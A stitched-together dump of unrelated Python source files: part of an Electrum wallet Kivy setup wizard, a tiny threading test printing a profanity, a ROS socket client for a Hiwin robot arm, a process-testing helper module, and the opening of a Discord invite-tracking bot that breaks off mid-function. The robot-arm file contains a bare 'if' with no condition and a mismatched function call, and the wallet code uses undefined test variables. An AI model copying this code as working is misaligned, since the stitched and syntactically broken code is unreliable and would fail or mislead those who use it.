height: self.texture_size[1] if self.opacity else 0
font_size: '33sp'
font_name: 'gui/kivy/data/fonts/tron/Tr2n.ttf'
GridLayout:
cols: 1
id: crcontent
spacing: '1dp'
Widget:
size_hint: 1, 0.3
GridLayout:
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
id: back
text: _('Back')
root: root
WizardButton:
id: next
text: _('Next')
root: root
disabled: root.value == ''
<WizardMultisigDialog>
value: 'next'
Widget
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: _("Choose the number of signatures needed to unlock funds in your wallet")
Widget
size_hint: 1, 1
GridLayout:
orientation: 'vertical'
cols: 2
spacing: '14dp'
size_hint: 1, 1
height: self.minimum_height
Label:
color: root.text_color
text: _('From {} cosigners').format(n.value)
Slider:
id: n
range: 2, 5
step: 1
value: 2
Label:
color: root.text_color
text: _('Require {} signatures').format(m.value)
Slider:
id: m
range: 1, n.value
step: 1
value: 2
<WizardChoiceDialog>
message : ''
Widget:
size_hint: 1, 1
Label:
color: root.text_color
size_hint: 1, None
text_size: self.width, None
height: self.texture_size[1]
text: root.message
Widget
size_hint: 1, 1
GridLayout:
row_default_height: '48dp'
orientation: 'vertical'
id: choices
cols: 1
spacing: '14dp'
size_hint: 1, None
<MButton@Button>:
size_hint: 1, None
height: '33dp'
on_release:
self.parent.update_amount(self.text)
<WordButton@Button>:
size_hint: None, None
padding: '5dp', '5dp'
text_size: None, self.height
width: self.texture_size[0]
height: '30dp'
on_release:
self.parent.new_word(self.text)
<SeedButton@Button>:
height: dp(100)
border: 4, 4, 4, 4
halign: 'justify'
valign: 'top'
font_size: '18dp'
text_size: self.width - dp(24), self.height - dp(12)
color: .1, .1, .1, 1
background_normal: 'atlas://gui/kivy/theming/light/white_bg_round_top'
background_down: self.background_normal
size_hint_y: None
<SeedLabel@Label>:
font_size: '12sp'
text_size: self.width, None
size_hint: 1, None
height: self.texture_size[1]
halign: 'justify'
valign: 'middle'
border: 4, 4, 4, 4
<RestoreSeedDialog>
message: ''
word: ''
BigLabel:
text: "ENTER YOUR SEED PHRASE"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input_seed
text: ''
on_text: Clock.schedule_once(root.on_text)
on_release: root.options_dialog()
SeedLabel:
text: root.message
BoxLayout:
id: suggestions
height: '35dp'
size_hint: 1, None
new_word: root.on_word
BoxLayout:
id: line1
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
MButton:
text: 'Q'
MButton:
text: 'W'
MButton:
text: 'E'
MButton:
text: 'R'
MButton:
text: 'T'
MButton:
text: 'Y'
MButton:
text: 'U'
MButton:
text: 'I'
MButton:
text: 'O'
MButton:
text: 'P'
BoxLayout:
id: line2
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 0.5, None
height: '33dp'
MButton:
text: 'A'
MButton:
text: 'S'
MButton:
text: 'D'
MButton:
text: 'F'
MButton:
text: 'G'
MButton:
text: 'H'
MButton:
text: 'J'
MButton:
text: 'K'
MButton:
text: 'L'
Widget:
size_hint: 0.5, None
height: '33dp'
BoxLayout:
id: line3
update_amount: root.update_text
size_hint: 1, None
height: '30dp'
Widget:
size_hint: 1, None
MButton:
text: 'Z'
MButton:
text: 'X'
MButton:
text: 'C'
MButton:
text: 'V'
MButton:
text: 'B'
MButton:
text: 'N'
MButton:
text: 'M'
MButton:
text: ' '
MButton:
text: '<'
<AddXpubDialog>
title: ''
message: ''
BigLabel:
text: root.title
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: ''
on_text: Clock.schedule_once(root.check_text)
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
IconButton:
id: scan
height: '48sp'
on_release: root.scan_xpub()
icon: 'atlas://gui/kivy/theming/light/camera'
size_hint: 1, None
WizardButton:
text: _('Paste')
on_release: root.do_paste()
WizardButton:
text: _('Clear')
on_release: root.do_clear()
<ShowXpubDialog>
xpub: ''
message: _('Here is your master public key. Share it with your cosigners.')
BigLabel:
text: "MASTER PUBLIC KEY"
GridLayout
cols: 1
padding: 0, '12dp'
orientation: 'vertical'
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
SeedButton:
id: text_input
text: root.xpub
SeedLabel:
text: root.message
GridLayout
rows: 1
spacing: '12dp'
size_hint: 1, None
height: self.minimum_height
WizardButton:
text: _('QR code')
on_release: root.do_qr()
WizardButton:
text: _('Copy')
on_release: root.do_copy()
WizardButton:
text: _('Share')
on_release: root.do_share()
<ShowSeedDialog>
spacing: '12dp'
value: 'next'
BigLabel:
text: "PLEASE WRITE DOWN YOUR SEED PHRASE"
GridLayout:
id: grid
cols: 1
pos_hint: {'center_y': .5}
size_hint_y: None
height: self.minimum_height
orientation: 'vertical'
spacing: '12dp'
SeedButton:
text: root.seed_text
on_release: root.options_dialog()
SeedLabel:
text: root.message
<LineDialog>
BigLabel:
text: root.title
SeedLabel:
text: root.message
TextInput:
id: passphrase_input
multiline: False
size_hint: 1, None
height: '27dp'
SeedLabel:
text: root.warning
''')
class WizardDialog(EventsDialog):
''' Abstract dialog to be used as the base for all Create Account Dialogs
'''
crcontent = ObjectProperty(None)
def __init__(self, wizard, **kwargs):
super(WizardDialog, self).__init__()
self.wizard = wizard
self.ids.back.disabled = not wizard.can_go_back()
self.app = App.get_running_app()
self.run_next = kwargs['run_next']
_trigger_size_dialog = Clock.create_trigger(self._size_dialog)
Window.bind(size=_trigger_size_dialog,
rotation=_trigger_size_dialog)
_trigger_size_dialog()
self._on_release = False
def _size_dialog(self, dt):
app = App.get_running_app()
if app.ui_mode[0] == 'p':
self.size = Window.size
else:
#tablet
if app.orientation[0] == 'p':
#portrait
self.size = Window.size[0]/1.67, Window.size[1]/1.4
else:
self.size = Window.size[0]/2.5, Window.size[1]
def add_widget(self, widget, index=0):
if not self.crcontent:
super(WizardDialog, self).add_widget(widget)
else:
self.crcontent.add_widget(widget, index=index)
def on_dismiss(self):
app = App.get_running_app()
if app.wallet is None and not self._on_release:
app.stop()
def get_params(self, button):
return (None,)
def on_release(self, button):
self._on_release = True
self.close()
if not button:
self.parent.dispatch('on_wizard_complete', None)
return
if button is self.ids.back:
self.wizard.go_back()
return
params = self.get_params(button)
self.run_next(*params)
class WizardMultisigDialog(WizardDialog):
def get_params(self, button):
m = self.ids.m.value
n = self.ids.n.value
return m, n
class WizardChoiceDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(WizardChoiceDialog, self).__init__(wizard, **kwargs)
self.message = kwargs.get('message', '')
choices = kwargs.get('choices', [])
layout = self.ids.choices
layout.bind(minimum_height=layout.setter('height'))
for action, text in choices:
l = WizardButton(text=text)
l.action = action
l.height = '48dp'
l.root = self
layout.add_widget(l)
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(app.dispatch, 'on_back')
def get_params(self, button):
return (button.action,)
class LineDialog(WizardDialog):
title = StringProperty('')
message = StringProperty('')
warning = StringProperty('')
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.ids.next.disabled = False
def get_params(self, b):
return (self.ids.passphrase_input.text,)
class ShowSeedDialog(WizardDialog):
seed_text = StringProperty('')
message = _("If you forget your PIN or lose your device, your seed phrase will be the only way to recover your funds.")
ext = False
def __init__(self, wizard, **kwargs):
super(ShowSeedDialog, self).__init__(wizard, **kwargs)
self.seed_text = kwargs['seed_text']
def on_parent(self, instance, value):
if value:
app = App.get_running_app()
self._back = _back = partial(self.ids.back.dispatch, 'on_release')
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_params(self, b):
return (self.ext,)
class WordButton(Button):
pass
class WizardButton(Button):
pass
class RestoreSeedDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
super(RestoreSeedDialog, self).__init__(wizard, **kwargs)
self._test = kwargs['test']
from electrum.mnemonic import Mnemonic
from electrum.old_mnemonic import words as old_wordlist
self.words = set(Mnemonic('en').wordlist).union(set(old_wordlist))
self.ids.text_input_seed.text = test_seed if is_test else ''
self.message = _('Please type your seed phrase using the virtual keyboard.')
self.title = _('Enter Seed')
self.ext = False
def options_dialog(self):
from .seed_options import SeedOptionsDialog
def callback(status):
self.ext = status
d = SeedOptionsDialog(self.ext, callback)
d.open()
def get_suggestions(self, prefix):
for w in self.words:
if w.startswith(prefix):
yield w
def on_text(self, dt):
self.ids.next.disabled = not bool(self._test(self.get_text()))
text = self.ids.text_input_seed.text
if not text:
last_word = ''
elif text[-1] == ' ':
last_word = ''
else:
last_word = text.split(' ')[-1]
enable_space = False
self.ids.suggestions.clear_widgets()
suggestions = [x for x in self.get_suggestions(last_word)]
if last_word in suggestions:
b = WordButton(text=last_word)
self.ids.suggestions.add_widget(b)
enable_space = True
for w in suggestions:
if w != last_word and len(suggestions) < 10:
b = WordButton(text=w)
self.ids.suggestions.add_widget(b)
i = len(last_word)
p = set()
for x in suggestions:
if len(x)>i: p.add(x[i])
for line in [self.ids.line1, self.ids.line2, self.ids.line3]:
for c in line.children:
if isinstance(c, Button):
if c.text in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
c.disabled = (c.text.lower() not in p) and bool(last_word)
elif c.text == ' ':
c.disabled = not enable_space
def on_word(self, w):
text = self.get_text()
words = text.split(' ')
words[-1] = w
text = ' '.join(words)
self.ids.text_input_seed.text = text + ' '
self.ids.suggestions.clear_widgets()
def get_text(self):
ti = self.ids.text_input_seed
return ' '.join(ti.text.strip().split())
def update_text(self, c):
c = c.lower()
text = self.ids.text_input_seed.text
if c == '<':
text = text[:-1]
else:
text += c
self.ids.text_input_seed.text = text
def on_parent(self, instance, value):
if value:
tis = self.ids.text_input_seed
tis.focus = True
#tis._keyboard.bind(on_key_down=self.on_key_down)
self._back = _back = partial(self.ids.back.dispatch,
'on_release')
app = App.get_running_app()
def on_key_down(self, keyboard, keycode, key, modifiers):
if keycode[0] in (13, 271):
self.on_enter()
return True
def on_enter(self):
#self._remove_keyboard()
# press next
next = self.ids.next
if not next.disabled:
next.dispatch('on_release')
def _remove_keyboard(self):
tis = self.ids.text_input_seed
if tis._keyboard:
tis._keyboard.unbind(on_key_down=self.on_key_down)
tis.focus = False
def get_params(self, b):
return (self.get_text(), False, self.ext)
class ConfirmSeedDialog(RestoreSeedDialog):
def get_params(self, b):
return (self.get_text(),)
def options_dialog(self):
pass
class ShowXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.xpub = kwargs['xpub']
self.ids.next.disabled = False
def do_copy(self):
self.app._clipboard.copy(self.xpub)
def do_share(self):
self.app.do_share(self.xpub, _("Master Public Key"))
def do_qr(self):
from .qr_dialog import QRDialog
popup = QRDialog(_("Master Public Key"), self.xpub, True)
popup.open()
class AddXpubDialog(WizardDialog):
def __init__(self, wizard, **kwargs):
WizardDialog.__init__(self, wizard, **kwargs)
self.is_valid = kwargs['is_valid']
self.title = kwargs['title']
self.message = kwargs['message']
self.allow_multi = kwargs.get('allow_multi', False)
def check_text(self, dt):
self.ids.next.disabled = not bool(self.is_valid(self.get_text()))
def get_text(self):
ti = self.ids.text_input
return ti.text.strip()
def get_params(self, button):
return (self.get_text(),)
def scan_xpub(self):
def on_complete(text):
if self.allow_multi:
self.ids.text_input.text += text + '\n'
else:
self.ids.text_input.text = text
self.app.scan_qr(on_complete)
def do_paste(self):
self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste()
def do_clear(self):
self.ids.text_input.text = ''
class InstallWizard(BaseWizard, Widget):
'''
events::
`on_wizard_complete` Fired when the wizard is done creating/ restoring
wallet/s.
'''
__events__ = ('on_wizard_complete', )
def on_wizard_complete(self, wallet):
"""overriden by main_window"""
pass
def waiting_dialog(self, task, msg):
'''Perform a blocking task in the background by running the passed
method in a thread.
'''
def target():
# run your threaded function
try:
task()
except Exception as err:
self.show_error(str(err))
# on completion hide message
Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1)
app = App.get_running_app()
app.show_info_bubble(
text=msg, icon='atlas://gui/kivy/theming/light/important',
pos=Window.center, width='200sp', arrow_pos=None, modal=True)
t = threading.Thread(target = target)
t.start()
def terminate(self, **kwargs):
self.dispatch('on_wizard_complete', self.wallet)
def choice_dialog(self, **kwargs):
choices = kwargs['choices']
if len(choices) > 1:
WizardChoiceDialog(self, **kwargs).open()
else:
f = kwargs['run_next']
f(choices[0][0])
def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open()
def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open()
def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open()
def confirm_seed_dialog(self, **kwargs):
kwargs['title'] = _('Confirm Seed')
kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it')
ConfirmSeedDialog(self, **kwargs).open()
def restore_seed_dialog(self, **kwargs):
RestoreSeedDialog(self, **kwargs).open()
def add_xpub_dialog(self, **kwargs):
kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.')
AddXpubDialog(self, **kwargs).open()
def add_cosigner_dialog(self, **kwargs):
kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index']
kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.')
AddXpubDialog(self, **kwargs).open()
def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open()
def show_error(self, msg):
app = App.get_running_app()
Clock.schedule_once(lambda dt: app.show_error(msg))
def request_password(self, run_next, force_disable_encrypt_cb=False):
def on_success(old_pin, pin):
assert old_pin is None
run_next(pin, False)
def on_failure():
self.show_error(_('PIN mismatch'))
self.run('request_password', run_next)
popup = PasswordDialog()
app = App.get_running_app()
popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2)
popup.open()
def action_dialog(self, action, run_next):
f = getattr(self, action)
f()
|
test.py
|
import threading
def app (x, eventForApp, eventForSet):
for i in range(1):
eventForApp. wait ();
eventForApp. clear ();
if x == 0:
print ("hello");
if x == 1:
print ("fuck");
eventForSet. set ();
e1 = threading. Event ();
e2 = threading. Event ();
t1 = threading. Thread (target=app, args=(0, e1, e2));
t2 = threading. Thread (target=app, args=(1, e2, e1));
t1. start ();
t2. start ();
e1. set ();
t1. join ();
t2. join ();
|
Hiwin_RT605_ArmCommand_Socket_20190627194935.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
#Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
arm_mode_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
class client():
def __init__(self):
#self.get_connect()
pass
def get_connect(self):
self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.s.connect(('192.168.0.1', 8080))
def send(self, msg):
self.s.send(msg.encode('utf-8')) #用utf-8來encode,還有其他encode的方法,str用utf-8就OK!
def get_recieve(self):
data = self.s.recv(1024) #1024指定buffer的大小,限制一次收多少
data.decode('utf-8')
return data
def close(self):
self.s.close()
#Socket = client()
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
socket_cmd.Speedmode = speedmode
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
pub.publish(state)
rate.sleep()
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command(s):
global arm_mode_flag,data
s = client()
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 6 ##切換初始mode狀態
print(data)
print("Socket:", s)
#Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
s.send(data)
##-----------socket client--------
def socket_client():
#global Socket
try:
Socket = client()
Socket.get_connect()
#Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
print('Connection has been successful')
except socket.error as msg:
print(msg)
sys.exit(1)
#print('Connection has been successful')
print(Socket.get_recieve())
Socket_feedback(Socket)
# while 1:
# feedback_str = Socket.recv(1024)
# #手臂端傳送手臂狀態
# if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
# state_feedback.ArmState = 0
# if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
# state_feedback.ArmState = 1
# if str(feedback_str[2]) == '54':# 6 策略完成
# state_feedback.ArmState = 6
# print("shutdown")
# #確認傳送旗標
# if str(feedback_str[4]) == '48':#回傳0 false
# state_feedback.SentFlag = 0
# if str(feedback_str[4]) == '49':#回傳1 true
# state_feedback.SentFlag = 1
# ##---------------socket 傳輸手臂命令 end-----------------
# if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
# break
rospy.on_shutdown(myhook)
Socket.close()
def Socket_feedback(s):
Socket = s
while 1:
if
Socket_command(Socket)
feedback_str = Socket.get_recieve()
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
##---------------socket 傳輸手臂命令 end-----------------
if state_feedback.ArmState == Taskcmd.Arm_feedback_Type.shutdown:
break
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 6##切換初始mode狀態
## 多執行緒
t = threading.Thread(target=socket_client)
t.start() # 開啟多執行緒
#time.sleep(1)
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join()
## 多執行序 end
|
process_tests.py
|
from __future__ import print_function
import errno
import os
import socket
import subprocess
import sys
import threading
import time
from contextlib import contextmanager
from logging import getLogger
try:
import fcntl
except ImportError:
fcntl = False
try:
import Queue
except ImportError:
import queue as Queue
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
try:
import unittest2 as unittest
except ImportError:
import unittest
__version__ = '2.1.2'
logger = getLogger(__name__)
BAD_FD_ERRORS = tuple(getattr(errno, name) for name in ['EBADF', 'EBADFD', 'ENOTCONN'] if hasattr(errno, name))
PY3 = sys.version_info[0] == 3
class BufferingBase(object):
BUFFSIZE = 8192
ENCODING = "utf8"
def __init__(self, fh):
self.buff = StringIO()
fd = fh.fileno()
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
fcntl.fcntl(fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
self.fd = fd
def read(self):
"""
Read any available data fd. Does NOT block.
"""
try:
while 1:
data = os.read(self.fd, self.BUFFSIZE)
if not data:
break
try:
data = data.decode(self.ENCODING)
except Exception as exc:
logger.exception("%r failed to decode %r: %r", self, data, exc)
raise
self.buff.write(data)
except OSError as exc:
if exc.errno not in (
errno.EAGAIN, errno.EWOULDBLOCK,
errno.EINPROGRESS
):
logger.exception("%r failed to read from FD %s: %r", self, self.fd, exc)
return self.buff.getvalue()
def reset(self):
self.buff = StringIO()
def cleanup(self):
pass
class ThreadedBufferingBase(BufferingBase):
def __init__(self, fh):
self.buff = StringIO()
self.fh = fh
self.thread = threading.Thread(target=self.worker)
self.thread.start()
self.queue = Queue.Queue()
def worker(self):
while not self.fh.closed:
try:
data = self.fh.readline()
if data:
self.queue.put(data)
else:
time.sleep(1)
except OSError as exc:
logger.exception("%r failed to read from %s: %r", self, self.fh, exc)
raise
def read(self):
while 1:
try:
data = self.queue.get_nowait()
except Queue.Empty:
break
try:
if isinstance(data, bytes):
data = data.decode(self.ENCODING)
except Exception as exc:
logger.exception("%r failed to decode %r: %r", self, data, exc)
raise
self.buff.write(data)
return self.buff.getvalue()
def cleanup(self, ):
self.thread.join()
class TestProcess(BufferingBase if fcntl else ThreadedBufferingBase):
__test__ = False
def __init__(self, *args, **kwargs):
kwargs.setdefault('env', os.environ)
kwargs.setdefault('bufsize', 1)
kwargs.setdefault('universal_newlines', True)
self.proc = subprocess.Popen(
args,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
close_fds=sys.platform != "win32",
**kwargs
)
super(TestProcess, self).__init__(self.proc.stdout)
@property
def is_alive(self):
return self.proc.poll() is None
def signal(self, sig):
self.proc.send_signal(sig)
def __repr__(self):
return "TestProcess(pid=%s, is_alive=%s)" % (self.proc.pid, self.is_alive)
def __enter__(self):
return self
def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None):
try:
for _ in range(5):
if self.proc.poll() is not None:
return
time.sleep(0.2)
for _ in range(5):
if self.proc.poll() is None:
try:
self.proc.terminate()
except Exception as exc:
if exc.errno == errno.ESRCH:
return
else:
logger.exception("%r failed to terminate process: %r", self, exc)
else:
return
time.sleep(0.2)
try:
logger.critical('%s killing unresponsive process!', self)
self.proc.kill()
except OSError as exc:
if exc.errno != errno.ESRCH:
raise
finally:
try:
data, _ = self.proc.communicate()
try:
if isinstance(data, bytes):
data = data.decode(self.ENCODING)
except Exception as exc:
logger.exception("%s failed to decode %r: %r", self, data, exc)
raise
self.buff.write(data)
except IOError as exc:
if exc.errno != errno.EAGAIN:
logger.exception('%s failed to cleanup buffers: %r', self, exc)
except Exception as exc:
logger.exception('%s failed to cleanup buffers: %r', self, exc)
try:
self.cleanup()
except Exception as exc:
logger.exception('%s failed to cleanup: %r', self, exc)
close = __exit__
class TestSocket(BufferingBase if fcntl else ThreadedBufferingBase):
__test__ = False
BUFFSIZE = 8192
def __init__(self, sock):
self.sock = sock
if PY3:
self.fh = sock.makefile('rbw', buffering=1)
else:
self.fh = sock.makefile(bufsize=0)
if fcntl:
sock.setblocking(0)
super(TestSocket, self).__init__(sock)
else:
super(TestSocket, self).__init__(self.fh)
def __enter__(self):
return self
def __exit__(self, exc_type=None, exc_value=None, exc_traceback=None):
try:
self.sock.shutdown(socket.SHUT_RDWR)
self.sock.close()
except (OSError, socket.error) as exc:
if exc.errno not in BAD_FD_ERRORS:
raise
close = __exit__
def wait_for_strings(cb, seconds, *strings):
"""
This checks that *string appear in cb(), IN THE GIVEN ORDER !
"""
start = time.time()
while True:
buff = cb()
check_strings = list(strings)
check_strings.reverse()
for line in buff.splitlines():
if not check_strings:
break
while check_strings and check_strings[-1] in line:
check_strings.pop()
if not check_strings:
return
if time.time() - start > seconds:
break
time.sleep(0.05)
raise AssertionError("Waited %0.2fsecs but %s did not appear in output in the given order !" % (
seconds, check_strings
))
@contextmanager
def dump_on_error(cb):
try:
yield
except Exception:
print("*********** OUTPUT ***********")
print(cb())
print("******************************")
raise
@contextmanager
def dump_always(cb):
try:
yield
finally:
print("*********** OUTPUT ***********")
print(cb())
print("******************************")
class ProcessTestCase(unittest.TestCase):
dump_on_error = staticmethod(dump_on_error)
wait_for_strings = staticmethod(wait_for_strings)
|
main2.py
|
import keep_alive
from discord.ext import commands
import threading
import discord
import asyncio
import aiohttp
import random
import socket
import ctypes
import time
import json
import ssl
import re
import os
token = ''
prefix = '/'
intents = discord.Intents().all()
bot = commands.Bot(command_prefix=prefix, case_insensitive=True, intents=intents)
bot.remove_command('help')
bots_channel = 123456789
threads = 500 + 4
queue = []
administrator_ids = []
administrator_roles = []
roles = {
'role id': '50', # @everyone
'role id 2': '50', # +50
'role id 3': '50' # Booster
}
database = {}
invites_database = {}
async def update_database():
with open('database.json', 'w') as f:
json.dump(database, f)
async def update_invites(guild):
invites = await guild.invites()
invites_database[f'{guild.id}'] = [tuple((invite.code, invite.uses)) for invite in invites]
@bot.event
async def on_invite_create(invite):
await update_invites(invite.guild)
@bot.event
async def on_invite_delete(invite):
await update_invites(invite.guild)
@bot.event
async def on_member_join(member):
inviter = None
guild = member.guild
guild_invites = await guild.invites()
for guild_invite in guild_invites:
try:
for invite in invites_database.get(f'{guild.id}'):
if invite[0] == guild_invite.code:
if int(guild_invite.uses) > invite[1]:
inviter = str(guild_invite.inviter.id)
database[f'{guild.id}'][f'{inviter}']['invites'] += 1
await update_database()
break
except:
pass
await update_invites(guild)
if f'{member.id}' not in database[f'{guild.id}'].keys():
database[f'{guild.id}'][f'{member.id}'] = {'invites': 0, 'inviter': f'{inviter}'}
await update_database()
elif f'{member.id}' in database[f'{guild.id}'].keys():
invites = database[f'{guild.id}'][f'{member.id}']['invites']
database[f'{guild.id}'][f'{member.id}'] = {'invites': int(invites), 'inviter': f'{inviter}'}
await update_database()
channel = await bot.fetch_channel(bots_channel)
if database[f'{guild.id}'][f'{member.id}']['inviter'] != None and inviter:
invites = database[f'{guild.id}'][inviter]['invites']
_50 = discord.utils.get(guild.roles, name='+50')
_inviter = await guild.fetch_member(int(inviter))
if invites >= 3 and _50 not in _inviter.roles:
await _inviter.add_roles(_50)
embed = discord.Embed(color=16083729, description=f'<@{member.id}> has joined! Invited by <@{inviter}> ({invites} invite' + ('s)' if invites != 1 else ')'))
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await channel.send(embed=embed)
else:
